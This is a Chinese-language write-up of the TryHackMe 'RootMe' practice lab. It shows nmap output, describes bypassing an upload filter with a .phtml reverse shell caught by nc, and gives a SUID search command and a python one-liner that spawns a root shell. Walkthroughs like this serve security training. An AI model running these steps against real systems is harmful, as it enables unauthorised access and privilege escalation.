[THM] RootMe

Reconnaissance

nmap扫描了一下端口,找到了两个端口,以及apache的版本,22端口运行了一个ssh服务

nmap -sV -sC -v 10.48.146.125                                      
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-02 06:48 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating Ping Scan at 06:48
Scanning 10.48.146.125 [4 ports]
Completed Ping Scan at 06:48, 0.25s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:48
Completed Parallel DNS resolution of 1 host. at 06:48, 0.03s elapsed
Initiating SYN Stealth Scan at 06:48
Scanning 10.48.146.125 [1000 ports]
Discovered open port 80/tcp on 10.48.146.125
Discovered open port 22/tcp on 10.48.146.125
Completed SYN Stealth Scan at 06:48, 2.18s elapsed (1000 total ports)
Initiating Service scan at 06:48
Scanning 2 services on 10.48.146.125
Completed Service scan at 06:48, 6.42s elapsed (2 services on 1 host)
NSE: Script scanning 10.48.146.125.
Initiating NSE at 06:48
Completed NSE at 06:48, 5.02s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.67s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Nmap scan report for 10.48.146.125
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:df:e3:a0:52:5f:1f:78:76:3e:eb:f1:fe:a8:38:05 (RSA)
|   256 3e:3c:96:f1:84:82:c2:a1:1d:a1:09:45:12:be:99:fb (ECDSA)
|_  256 c5:44:76:a7:ef:8c:fb:bd:a5:53:51:a2:a7:0c:3b:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.03 seconds
           Raw packets sent: 1083 (47.628KB) | Rcvd: 1080 (43.208KB)

之后是对80端口的http服务的进一步利用,使用dirsearch爆破一下目录,可以看到/panel和/uploads/目录都很有意思,浏览器查看后发现一个是文件上传的,一个是文件存放的路径,那么后面利用的思路还是很清晰的

Getting a shell

使用了一个php的反弹木马就可以,不过这里对后缀做了一个检查,php后缀是不允许上传的,但是我改成了phtml就可以了,其他的倒也没多试

然后本地用nc开启端口监听,去/uploads目录点击那个反弹目录就可以getshell了

使用find命令找到user.txt在/var/www/下拿到第一个flag

Privilege escalation

suid提权,find / -perm -u=s -type f 2> /dev/null查找root的suid文件,在里面看到一个python2.7的,感觉很有利用的可能(不过第一空我一直填写python2.7没对,发现只要python就可以了,也是又迷糊了一会)

之后去GTFO网站查看利用方式,找到suid的利用方式是这一条命令python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

那么就拿到root的shell权限,很容易到/root下拿到了最后的flag